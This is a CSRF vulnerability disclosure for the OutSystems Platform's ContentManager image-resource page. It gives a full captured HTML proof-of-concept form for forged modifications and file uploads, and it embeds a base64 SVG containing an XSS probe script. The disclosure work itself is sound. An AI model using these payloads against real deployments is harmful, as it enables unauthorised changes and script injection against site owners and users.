[Vulnerability Type]
Cross Site Request Forgery (CSRF)
[Attack Type]
Remote
[CVE Impact Other]
Attackers can modify and upload files to the Outsystems Platform without validation of source origin request.
[Attack Vectors]
With HTML exploit it's possible execute modifications and file uploads.
[Affected Product Code Base]
Outsystems Platform https://www.outsystems.com/platform/ - From 10 to 11 version. Solution don't inform if have a fixed version.
[Vendor of Product]
Outsystems https://www.outsystems.com/
[Additional Information]
This CSRF vulnerability affect to all custom implementations of Outsystems Platform at subdomains on *outsystemsenterprise.com.
[Affected Component]
*.outsystemsenterprise.com/"example_of_custom_name_or_product_company"_ContentManager/ImageResourceDetail.aspx
[HTML CSRF demo]
<form method="post" action="https://example.outsystemsenterprise.com/example_of_custom_name_or_product_company_ContentManager/ImageResourceDetail.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="WebForm1" enctype="multipart/form-data" name="WebForm1">
<div class="aspNetHidden">
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__OSVSTATE" id="__OSVSTATE" value="aGfxWAykxJjW7p0rmrYdqaPmJI/EyrQDXQ0lHKhP8VmEQF4CLlgX5qJUSYwr+s9Pdp/fxW5dP5wqXExaMBoFsMR2Ws62sQseOARwTpTka32i7L0QM65cCzoxebuxDdjR1vAxWdZ7u0ydjBAjiQg+yRw3AKrBji/ZHmcKR+svBdSfrGxyHqzoODCJwCusQKEEwPXMkmZvTngyguBQJqbSW7HJKfCNmMAlz3tCWk5REAk3ga5QtQsiUD1L9Np6/nFRoYvjlRHzCo96+bOqg2Dn0XSHlC35fLZIdBab4y1gj7bEtnM/pqfX8llFSbXJuOOAlcniKDRni43M9P7fLBEeXdK1X3bUfvK5wN6Rate/Oe/exOH38A/XmrB+LxvENp0zXQkWojH8IRluU8xhrj+3/B+x38A6H/hxOtrpjulrM567Z4VG8IXutJPbrJCIFdK3E9cmaueZowG5yLNQC59Ur/YPl5m7JPUHLZBOftPXYgk7hRfJtkaooYwy3oCcC+lUc4wbCqJJig7GrMiHWLqvonXqrefgicTc4NJv8ru0t5eQukyGKUVXkIpt4oWfLqh0RPj2ezSJTO2tinhZJDtYlL/tjAL6GW13RejewQTicp3JWHByB0Uq/Z4Xwe3savBMBnGeVp6vncKmh0/yxDjy037iPewoH0UO5lIDvUzGMEtaJ17R7eZyIdQuAvZjmgPLOA22PdZpE1N99Jyqbm3lI5JuL1s9gha1EqXVl7sxLWB0NwEp90wxuRuxi8b7oCrJCoYFP9sHF6ulkK9GDX/qrBKihVJRUNO1VhBGXcFkIQhAt0NK6m0+w6twPCSGJe4IrOB0U07t0/hm2LxMex6DL+mpmWaXtGzWdKsIcQcRFpjbq+2nBVM2VavaeMWv7n2LSPAnsI5VLyDTfFbqUW5eerrEhZKZcrGtoYrT/OuGRsjuX8rsjl3drItOlNVAdDy1OTfEB/OGf5Zp+TfqGtoLBEfRGtL9p33RYPn78JzsZoNI8TkpQD9snfJcKtfSQLa/vISkzSmV+eKFOhP1cfddhk7Xl/V8O68DmnZY0GMKfzBqaPJGqHTFao8Mj3VbWTP3SPX90wlgntO3JGPwkAdAPrcvwYcwVgwAxHymj1nrYssQNnzMBamoltuynmM/AOqZDfxfHOo6a9697lZibABjodSCmBZ7wtD2YMEhjIBPB6I=" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['WebForm1'];
if (!theForm) {
theForm = document.WebForm1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
OsPrepareCheckboxesForSubmit();
OsFixUploadBeforeSubmit();
if (!OsValidatorOnSubmit()) return false;
return true;
}
//]]>
</script>
<div class="aspNetHidden">
<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="41422E84" />
</div>
<div class="Page startHidden linux firefox en DublinTheme" data-silklayout="dublin"><div id="DublinTheme_wt47_block_wtHeader" class="Header"><a id="DublinTheme_wt47_block_wtHeader_wt9_DublinTheme_wt3_block_wt3" tabindex="1" class="Button Icon Header_buttonMenu" href="#!"><span class="fa fa-fw fa-bars"></span></a><div id="DublinTheme_wt47_block_wtHeader_wt9_DublinTheme_wt3_block_wtHeader_title" class="Header_title"><a id="DublinTheme_wt47_block_wtHeader_wt9_DublinTheme_wt3_block_wtHeader_title_wt2_wt1" tabindex="2" href="/example_ContentManager/"><img alt="" src="/example_ContentManager/img/Header_Logo.png?6859" />Example</a></div ><div id="DublinTheme_wt47_block_wtHeader_wt9_DublinTheme_wt3_block_wtHeader_search" class="Header_search PH OSAutoMarginTop"></div ><div class="Header_user OSInline" align="right"><div id="DublinTheme_wt47_block_wtHeader_wt9_DublinTheme_wt3_block_wtHeader__activity" class="Header__activity"><div class="IconBadge"><span class="fa fa-fw fa-bell"></span><div class="IconBadge_number">44</div ></div ></div ><div id="DublinTheme_wt47_block_wtHeader_wt9_DublinTheme_wt3_block_wtHeader_loginInfo" class="Header__loginInfo OSAutoMarginTop"><div class="LoginInfo"><div id="DublinTheme_wt47_block_wtHeader_wt9_DublinTheme_wt3_block_wtHeader_loginInfo_wt6_wtLoginInfo_username" class="LoginInfo_username"><img alt="" src="/example_ContentManager/img/default_user.png?6859" /><span class="fa fa-fw fa-angle-down"></span></div ><div id="DublinTheme_wt47_block_wtHeader_wt9_DublinTheme_wt3_block_wtHeader_loginInfo_wt6_WebPatterns_wt19_block_wtBalloon_Wrapper" class="OSInline" style="display:none"><div id="DublinTheme_wt47_block_wtHeader_wt9_DublinTheme_wt3_block_wtHeader_loginInfo_wt6_WebPatterns_wt19_block_wtContent" class="Balloon_content PH"><div align="center"><img class="Persona Image_circle" alt="" src="/example_ContentManager/img/default_user.png?6859" /></div ><div align="center" style="margin-top: 10px"></div ><div align="center" style="margin-top: 10px"><a id="DublinTheme_wt47_block_wtHeader_wt9_DublinTheme_wt3_block_wtHeader_loginInfo_wt6_WebPatterns_wt19_block_wtContent_wt6" tabindex="3" class="Button Link First" href="javascript:__doPostBack('DublinTheme_wt47$block$wtHeader$wt9$DublinTheme_wt3$block$wtHeader_loginInfo$wt6$WebPatterns_wt19$block$wtContent$wt6','')">Logout</a></div ></div ></div ><script>$(document).ready(function() {
$content = $('#DublinTheme_wt47_block_wtHeader_wt9_DublinTheme_wt3_block_wtHeader_loginInfo_wt6_WebPatterns_wt19_block_wtContent').detach();
$('#DublinTheme_wt47_block_wtHeader_wt9_DublinTheme_wt3_block_wtHeader_loginInfo_wt6_wtLoginInfo_username').tooltipster({
content: $content,
trigger: 'click',
interactive: true,
contentCloning: false,
position: 'bottom',
theme: 'Balloon',
zindex: $('#DublinTheme_wt47_block_wtHeader_wt9_DublinTheme_wt3_block_wtHeader_loginInfo_wt6_wtLoginInfo_username').closest('.Header').css('zIndex')
}).addClass('balloon');
});</script></div ></div ></div ></div ><div id="DublinTheme_wt47_block_wtMenu" class="Menu OSInline"><div class="Application_Menu OSInline"><div class="Menu_TopMenus OSInline"><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt11_block_wtDropDownButtonRoot" class="Menu_DropDownButton OSInline"><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt11_block_wtDropDownButtonElement" class="Menu_TopMenu"><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt11_block_wtMenuItem"><a id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt11_block_wtMenuItem_wt36" tabindex="4" href="ImageResourceTypes.aspx">Imagenes</a></div ></div ><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt11_block_wtDropDownPanel" class="Menu_DropDownPanel"><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt11_block_wtMenuSubItems" class="Menu_SubItemsPlaceholder"><a id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt11_block_wtMenuSubItems_wt13" tabindex="5" href="ImageResources.aspx">Image Resources</a><a id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt11_block_wtMenuSubItems_wt18" tabindex="6" href="ImageResourceTypes.aspx">Tipo de Imagen</a></div ></div ></div ><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt14_block_wtDropDownButtonRoot" class="Menu_DropDownButton OSInline"><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt14_block_wtDropDownButtonElement" class="Menu_TopMenu"><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt14_block_wtMenuItem"><a id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt14_block_wtMenuItem_wt22" tabindex="7" href="ProductCategories.aspx">Products</a></div ></div ><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt14_block_wtDropDownPanel" class="Menu_DropDownPanel"><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt14_block_wtMenuSubItems" class="Menu_SubItemsPlaceholder"><a id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt14_block_wtMenuSubItems_wt31" tabindex="8" href="Products.aspx">Products</a><a id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt14_block_wtMenuSubItems_wt32" tabindex="9" href="ProductCategories.aspx">Product Categories</a></div ></div ></div ><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt4_block_wtDropDownButtonRoot" class="Menu_DropDownButton OSInline"><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt4_block_wtDropDownButtonElement" class="Menu_TopMenu"><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt4_block_wtMenuItem"><a id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt4_block_wtMenuItem_wt37" tabindex="10" href="Ranks.aspx">Ranks</a></div ></div ><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt4_block_wtDropDownPanel" class="Menu_DropDownPanel"><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt4_block_wtMenuSubItems" class="Menu_SubItemsPlaceholder"></div ></div ></div ><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt20_block_wtDropDownButtonRoot" class="Menu_DropDownButton OSInline"><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt20_block_wtDropDownButtonElement" class="Menu_TopMenu"><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt20_block_wtMenuItem"><a id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt20_block_wtMenuItem_wt15" tabindex="11" href="Voices.aspx">Voices</a></div ></div ><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt20_block_wtDropDownPanel" class="Menu_DropDownPanel"><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt20_block_wtMenuSubItems" class="Menu_SubItemsPlaceholder"></div ></div ></div ><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt16_block_wtDropDownButtonRoot" class="Menu_DropDownButton OSInline"><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt16_block_wtDropDownButtonElement" class="Menu_TopMenu"><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt16_block_wtMenuItem"><a id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt16_block_wtMenuItem_wt21" tabindex="12" href="Screens.aspx">Screens</a></div ></div ><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt16_block_wtDropDownPanel" class="Menu_DropDownPanel"><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt16_block_wtMenuSubItems" class="Menu_SubItemsPlaceholder"></div ></div ></div ><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt34_block_wtDropDownButtonRoot" class="Menu_DropDownButton OSInline"><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt34_block_wtDropDownButtonElement" class="Menu_TopMenu"><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt34_block_wtMenuItem"><a id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt34_block_wtMenuItem_wt5" tabindex="13" href="ChatDetail.aspx?ChatId=1">Chats</a></div ></div ><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt34_block_wtDropDownPanel" class="Menu_DropDownPanel"><div id="DublinTheme_wt47_block_wtMenu_wt24_RichWidgets_wt34_block_wtMenuSubItems" class="Menu_SubItemsPlaceholder"></div ></div ></div ></div ></div ></div ><div class="Content ThemeGrid_Wrapper"><div class="ThemeGrid_Container" style="margin-top: 0px"><div class="HeaderPage ThemeGrid_Width12"><div id="DublinTheme_wt47_block_wtBreadcrumbs" class="BreadcrumbsContainer PH"></div ><div class="TitleActions"><div id="DublinTheme_wt47_block_wtTitle" class="Heading1 Title PH OSInline"></div ><div id="DublinTheme_wt47_block_wtActions" class="Actions Title_Links PH" style="margin-top: 0px"></div ></div ></div ><div id="DublinTheme_wt47_block_wtMainContent" class="MainContent"><div class='form-left Form ThemeGrid_Width6' style='' id='DublinTheme_wt47_block_wtMainContent_wtImageResourceForm' name='DublinTheme_wt47$block$wtMainContent$wtImageResourceForm'><div ><label class=' ThemeGrid_Width4 MandatoryLabel' style='' for='DublinTheme_wt47_block_wtMainContent_wtImageResource_Name' >Name</label><input name="DublinTheme_wt47$block$wtMainContent$wtImageResource_Name" type="text" value="AppleMusic" maxlength="50" id="DublinTheme_wt47_block_wtMainContent_wtImageResource_Name" tabindex="14" class="ThemeGrid_Width8 ThemeGrid_MarginGutter Mandatory" onkeydown="return OsEnterKey('DublinTheme_wt47_block_wtMainContent_wt10', arguments[0] || window.event)" /><span style="display: none;" class="ValidationMessage" id="ValidationMessage_DublinTheme_wt47_block_wtMainContent_wtImageResource_Name"></span></div ><div class="OSAutoMarginTop"><label class=' ThemeGrid_Width4' style='' for='DublinTheme_wt47_block_wtMainContent_wtImageResource_IsActive' >Is Active</label><input type="checkbox" name="DublinTheme_wt47$block$wtMainContent$wtImageResource_IsActive" checked="checked" id="DublinTheme_wt47_block_wtMainContent_wtImageResource_IsActive" tabindex="15" class="ThemeGrid_MarginGutter" onkeydown="return OsEnterKey('DublinTheme_wt47_block_wtMainContent_wt10', arguments[0] || window.event)" /><span style="display: none;" class="ValidationMessage" id="ValidationMessage_DublinTheme_wt47_block_wtMainContent_wtImageResource_IsActive"></span></div ><div class="OSAutoMarginTop"><label class=' ThemeGrid_Width4' style='' for='DublinTheme_wt47_block_wtMainContent_wtImageResource_ImageResourceType' >Image Resource Type</label><select name="DublinTheme_wt47$block$wtMainContent$wtImageResource_ImageResourceType" id="DublinTheme_wt47_block_wtMainContent_wtImageResource_ImageResourceType" tabindex="16" class="ThemeGrid_Width8 ThemeGrid_MarginGutter" onkeydown="return OsEnterKey('DublinTheme_wt47_block_wtMainContent_wt10', arguments[0] || window.event)">
<option value="__ossli_0">-</option>
<option selected="selected" value="1">RedSocial</option>
</select><span style="display: none;" class="ValidationMessage" id="ValidationMessage_DublinTheme_wt47_block_wtMainContent_wtImageResource_ImageResourceType"></span></div ><div class="OSAutoMarginTop"><label class=' ThemeGrid_Width4' style='' for='DublinTheme_wt47_block_wtMainContent_wtImageResource_Position' >Position</label><input name="DublinTheme_wt47$block$wtMainContent$wtImageResource_Position" type="text" maxlength="50" id="DublinTheme_wt47_block_wtMainContent_wtImageResource_Position" tabindex="17" class="ThemeGrid_Width8 ThemeGrid_MarginGutter" onkeydown="return OsEnterKey('DublinTheme_wt47_block_wtMainContent_wt10', arguments[0] || window.event)" /><span style="display: none;" class="ValidationMessage" id="ValidationMessage_DublinTheme_wt47_block_wtMainContent_wtImageResource_Position"></span></div ><div class="OSAutoMarginTop"><input onclick="OsPage_ClientValidate('DublinTheme_wt47_block_wtMainContent_wt10');" type="submit" name="DublinTheme_wt47$block$wtMainContent$wt10" value="Guardar" id="DublinTheme_wt47_block_wtMainContent_wt10" tabindex="18" class="Button Is_Default ThemeGrid_Margin4First" /><input onclick="window.location.href='ImageResources.aspx'; return false;" type="submit" name="DublinTheme_wt47$block$wtMainContent$wt41" value="Cancelar" id="DublinTheme_wt47_block_wtMainContent_wt41" tabindex="19" class="Button ThemeGrid_MarginGutter" /></div ></div><script type="text/javascript">outsystems.internal.$(function() { OutSystems.Plugin.Widgets.Form.init('DublinTheme_wt47_block_wtMainContent_wtImageResourceForm');});</script><div id="DublinTheme_wt47_block_wtMainContent_wtIconManagerContainer" class="ThemeGrid_Width5" align="left" style="margin-left: 19px"><div id="DublinTheme_wt47_block_wtMainContent_wtIConContainer" class="ThemeGrid_Width4"><img id="DublinTheme_wt47_block_wtMainContent_wt5_wtimage" class="preview paymentMethodImage" alt="" src="/Backoffice/img/notyetavailable.jpg" style="height:100px;width:100px;" /><div class="OSInline"><script type='text/javascript'>
osjs(document).ready(function() {
osjs('#DublinTheme_wt47_block_wtMainContent_wt5_wtimage').attr('src', 'data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBzdGFuZGFsb25lPSJubyI/Pg0KPCFET0NUWVBFIHN2ZyBQVUJMSUMgIi0vL1czQy8vRFREIFNWRyAxLjEvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvR3JhcGhpY3MvU1ZHLzEuMS9EVEQvc3ZnMTEuZHRkIj4NCg0KPHN2ZyB2ZXJzaW9uPSIxLjEiIGJhc2VQcm9maWxlPSJmdWxsIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPg0KICAgPHBvbHlnb24gaWQ9InRyaWFuZ2xlIiBwb2ludHM9IjAsMCAwLDUwIDUwLDAiIGZpbGw9IiMwMDk5MDAiIHN0cm9rZT0iIzAwNDQwMCIvPg0KICAgPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KICAgICAgYWxlcnQoJ1RoaXMgYXBwIGlzIHByb2JhYmx5IHZ1bG5lcmFibGUgdG8gWFNTIGF0dGFja3MhJyk7DQogICA8L3NjcmlwdD4NCjwvc3ZnPg==');
});
</script></div ><br/> <script type='text/javascript'>
osjs(document).ready(function() {
readUrl = function(input) {
//if File is there
if(input.files && input.files[0]) {
//create a Filereader
var reader = new FileReader();
//bind a function to the reader which will be executed when file is completely loaded
reader.onload = function(e) {
//Here you render your preview image
osjs('#noImage,.preview').attr('src', e.target.result);
}
reader.readAsDataURL(input.files[0]);
}
}
// bind a onChange event to the uploader
osjs('#DublinTheme_wt47_block_wtMainContent_WebPatterns_wt20_block_wtUploadWidget_wtUploadIcon').bind('change', function() {
readUrl(this);
});
});
</script></div ><div class="ThemeGrid_Width8 ThemeGrid_MarginGutter"><div id="DublinTheme_wt47_block_wtMainContent_wtUploadContainer" class="ThemeGrid_Width10" align="left" style="margin-left: 19px"><div class="FileUpload"><div class="FileUpload_Button OSInline"><span class="Button Is_Default">Seleccionar un ícono</span></div ><div id="DublinTheme_wt47_block_wtMainContent_WebPatterns_wt20_block_wtEmptyMessage" class="FileUpload_Label">Solo JPG o PNG</div ><div id="DublinTheme_wt47_block_wtMainContent_WebPatterns_wt20_block_wtUploadWidget" class="FileUpload_Widget"><input name="DublinTheme_wt47$block$wtMainContent$WebPatterns_wt20$block$wtUploadWidget$wtUploadIcon" type="file" id="DublinTheme_wt47_block_wtMainContent_WebPatterns_wt20_block_wtUploadWidget_wtUploadIcon" class="uploadwidget OSFillParent" tabIndex="20" /></div ></div ></div ></div ></div ></div ><div class="Footer" style="margin-top: 0px"><div id="DublinTheme_wt47_block_wtFooter"><div >Built with <a id="DublinTheme_wt47_block_wtFooter_DublinTheme_wt43_block_wt1" tabindex="22" title="Custom Enterprise Web Application Development Platform" alt="Custom Enterprise Web Application Development Platform" href="http://www.outsystems.com/ce/web-application-development/">OutSystems Platform</a></div ></div ></div ></div ><script>SilkDeviceDetect.init('desktop small', false, false, 'firefox', false, false, false)</script><div id="DublinTheme_wt47_block_WebPatterns_wt10_block_wt13_wtdivWait" class="Feedback_AjaxWait" align="center" style="display:none"><div id="DublinTheme_wt47_block_WebPatterns_wt10_block_wt13_wtloader" class="Loader"></div >Loading</div ><script>RichWidgets_Feedback_AjaxWait_init('DublinTheme_wt47_block_WebPatterns_wt10_block_wt13_wtdivWait');</script><span id="DublinTheme_wt47_block_WebPatterns_wt10_block_RichWidgets_wt9_block"><script type='text/javascript'>
OsRegisterExceptionHandler(RichWidgets_Feedback_Message_ErrorHandler)
</script><div id="DublinTheme_wt47_block_WebPatterns_wt10_block_RichWidgets_wt9_block_wtFeedback_Wrapper" class="Feedback_Message_Wrapper"><span id="DublinTheme_wt47_block_WebPatterns_wt10_block_RichWidgets_wt9_block_wtnotify"><span class="NotifyWidget"></span><SCRIPT type="text/javascript">
//<![CDATA[
RichWidgets_Feedback_Message_notifyWidget ='DublinTheme_wt47_block_WebPatterns_wt10_block_RichWidgets_wt9_block_wtnotify';
//]]>
</SCRIPT></span></div ></span></div ></div >
<script type="text/javascript">
//<![CDATA[
var OsPage_ValidatorsOrder = new Array("DublinTheme_wt47_block_wtMainContent_wtImageResource_Name", "DublinTheme_wt47_block_wtMainContent_wtImageResource_ImageResourceType", "DublinTheme_wt47_block_wtMainContent_wtImageResource_Position");
var OsPage_Validators = new Array({},
{controltovalidate: "DublinTheme_wt47_block_wtMainContent_wtImageResource_Name", evaluationfunction: "OsRequiredFieldValidatorEvaluateIsValid", errormessage: "Required field!", initialvalue: ""},
{controltovalidate: "DublinTheme_wt47_block_wtMainContent_wtImageResource_Name", evaluationfunction: "OsCustomValidatorEvaluateIsValid", errormessage: "Text expected!", clientvalidationfunction: "OsCustomValidatorText"},
{controltovalidate: "DublinTheme_wt47_block_wtMainContent_wtImageResource_Position", evaluationfunction: "OsCustomValidatorEvaluateIsValid", errormessage: "Text expected!", clientvalidationfunction: "OsCustomValidatorText"});
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var OsPage_ValidationActive = false;
OsValidatorOnLoad();
function OsValidatorOnSubmit() {
if (OsPage_ValidationActive) { return OsValidatorCommonOnSubmit(); }
return true;
}
// ]]>
</script>
<script type="text/javascript">
//<![CDATA[
var OsPage_DublinTheme_wt47_block_wtMainContent_wtImageResourceFormElements = new Array("DublinTheme_wt47_block_wtMainContent_wtImageResource_Name", "DublinTheme_wt47_block_wtMainContent_wtImageResource_IsActive", "DublinTheme_wt47_block_wtMainContent_wtImageResource_ImageResourceType", "DublinTheme_wt47_block_wtMainContent_wtImageResource_Position");
document.getElementById("DublinTheme_wt47_block_wtMainContent_wt10").elementsToValidate=(window.OsPage_DublinTheme_wt47_block_wtMainContent_wtImageResourceFormElements||new Array());
document.getElementById("DublinTheme_wt47_block_wtMainContent_wt41").elementsToValidate=(window.OsPage_DublinTheme_wt47_block_wtMainContent_wtImageResourceFormElements||new Array());
// ]]>
</script>
</form><script type="text/javascript">outsystems.internal.$._waitForViewstate = true;outsystems.internal.$(document).ready(function() {outsystems.internal.$('input[name=__OSVSTATE]').val('aGfxWAykxJjW7p0rmrYdqaPmJI/EyrQDXQ0lHKhP8VmEQF4CLlgX5qJUSYwr+s9Pdp/fxW5dP5wqXExaMBoFsMR2Ws62sQseOARwTpTka32i7L0QM65cCzoxebuxDdjR1vAxWdZ7u0ydjBAjiQg+yRw3AKrBji/ZHmcKR+svBdSfrGxyHqzoODCJwCusQKEEwPXMkmZvTngyguBQJqbSW7HJKfCNmMAlz3tCWk5REAk3ga5QtQsiUD1L9Np6/nFRoYvjlRHzCo96+bOqg2Dn0XSHlC35fLZIdBab4y1gj7bEtnM/pqfX8llFSbXJuOOAlcniKDRni43M9P7fLBEeXdK1X3bUfvK5wN6Rate/Oe/exOH38A/XmrB+LxvENp0zXQkWojH8IRluU8xhrj+3/B+x38A6H/hxOtrpjulrM567Z4VG8IXutJPbrJCIFdK3E9cmaueZowG5yLNQC59Ur/YPl5m7JPUHLZBOftPXYgk7hRfJtkaooYwy3oCcC+lUc4wbCqJJig7GrMiHWLqvonXqrefgicTc4NJv8ru0t5eQukyGKUVXkIpt4oWfLqh0RPj2ezSJTO2tinhZJDtYlL/tjAL6GW13RejewQTicp3JWHByB0Uq/Z4Xwe3savBMBnGeVp6vncKmh0/yxDjy037iPewoH0UO5lIDvUzGMEtaJ17R7eZyIdQuAvZjmgPLOA22PdZpE1N99Jyqbm3lI5JuL1s9gha1EqXVl7sxLWB0NwEp90wxuRuxi8b7oCrJCoYFP9sHF6ulkK9GDX/qrBKihVJRUNO1VhBGXcFkIQhAt0NK6m0+w6twPCSGJe4IrOB0U07t0/hm2LxMex6DL+mpmWaXtGzWdKsIcQcRFpjbq+2nBVM2VavaeMWv7n2LSPAnsI5VLyDTfFbqUW5eerrEhZKZcrGtoYrT/OuGRsjuX8rsjl3drItOlNVAdDy1OTfEB/OGf5Zp+TfqGtoLBEfRGtL9p33RYPn78JzsZoNI8TkpQD9snfJcKtfSQLa/vISkzSmV+eKFOhP1cfddhk7Xl/V8O68DmnZY0GMKfzBqaPJGqHTFao8Mj3VbWTP3SPX90wlgntO3JGPwkAdAPrcvwYcwVgwAxHymj1nrYssQNnzMBamoltuynmM/AOqZDfxfHOo6a9697lZibABjodSCmBZ7wtD2YMEhjIBPB6I=');outsystems.internal.$._waitForViewstate = false;});</script>
<!-- Begin Inbox Block --><link href="/EPA_Taskbox/Blocks/EPA_Taskbox/Inbox_Flow/Inbox.css?1087" type="text/css" rel="stylesheet" /><script src="/EPA_Taskbox/Blocks/EPA_Taskbox/Inbox_Flow/Inbox.js?1087" type="text/javascript" charset="UTF-8"></script><div><span id="epa_wtEPATaskbox_ViewOptions_JS"><script language="javascript">var EPATaskbox_ViewOptions = { allowGlow : false, pollInterval : 20, maxPollInterval : 1800, cookieTimeout : 2, applicationServer : ".Net", developmentMode : false};</script></span><!--[if gte IE 5.5]><![if lt IE 7]><style type="text/css">div#epa_wtEPATaskbox_ExtraStylesContainer { _right: auto; _bottom: auto; _left: expression( ( -95 - epa_wtEPATaskbox_ExtraStylesContainer.offsetWidth + ( document.documentElement.clientWidth ? document.documentElement.clientWidth : document.body.clientWidth ) + ( ignoreMe2 = document.documentElement.scrollLeft ? document.documentElement.scrollLeft : document.body.scrollLeft ) ) + 'px' ); _top: expression( ( -95 - epa_wtEPATaskbox_ExtraStylesContainer.offsetHeight + ( document.documentElement.clientHeight ? document.documentElement.clientHeight : document.body.clientHeight ) + ( ignoreMe = document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop ) ) + 'px' );}</style><![endif]><![if gte IE 7]><script>if(document.compatMode == 'BackCompat') { window.attachEvent('onload', function() { var div = document.createElement('div'); div.style.display = 'none'; div.innerHTML = "style<style type=\"text/css\">"+ " div#epa_wtEPATaskbox_ExtraStylesContainer { "+ " "+ " _right: auto; _bottom: auto; "+ " _left: expression( ( -51 - epa_wtEPATaskbox_ExtraStylesContainer.offsetWidth + ( document.documentElement.clientWidth ? document.documentElement.clientWidth : document.body.clientWidth ) + ( ignoreMe2 = document.documentElement.scrollLeft ? document.documentElement.scrollLeft : document.body.scrollLeft ) ) + 'px' ); "+ " _top: expression( ( -95 - epa_wtEPATaskbox_ExtraStylesContainer.offsetHeight + ( document.documentElement.clientHeight ? document.documentElement.clientHeight : document.body.clientHeight ) + ( ignoreMe = document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop ) ) + 'px' ); "+ " } "+ " </style>"; document.body.appendChild(div);});};</script><![endif]><![endif]--><div id="epa_wtEPATaskbox_Container" class="EPATaskbox_Container"><div id="epa_wtEPATaskbox_ExtraStylesContainer" class="EPATaskbox_ExtraStylesContainer"><div class="EPATaskbox_IconifiedContainer"><div class="EPATaskbox_Icon_EPATaskbox_NotGlowing"></div><div class="EPATaskbox_Icon_EPATaskbox_Glowing"></div><div class="EPATaskbox_ActivityCount"></div></div><div class="EPATaskbox_ExpandedContainer"><div class="EPATaskbox_ExpandedIcon_EPATaskbox_NotGlowing"></div><div class="EPATaskbox_ExpandedIcon_EPATaskbox_Glowing"></div><div class="EPATaskbox_ExpandedText">Click here to see your activities</div></div><div class="EPATaskbox_OpenedContainer"><div class="EPATaskbox_FrameContainer"></div></div></div></div></div><!-- End Inbox Block --><script type='text/javascript'> EPATaskbox.instance = new EPATaskbox(outsystems.internal.$('.EPATaskbox_Container'), 1290, 0, false, null); </script><script src="/PerformanceProbe/performanceprobe.js?10_0_904_3" type="text/javascript" charset="UTF-8"></script>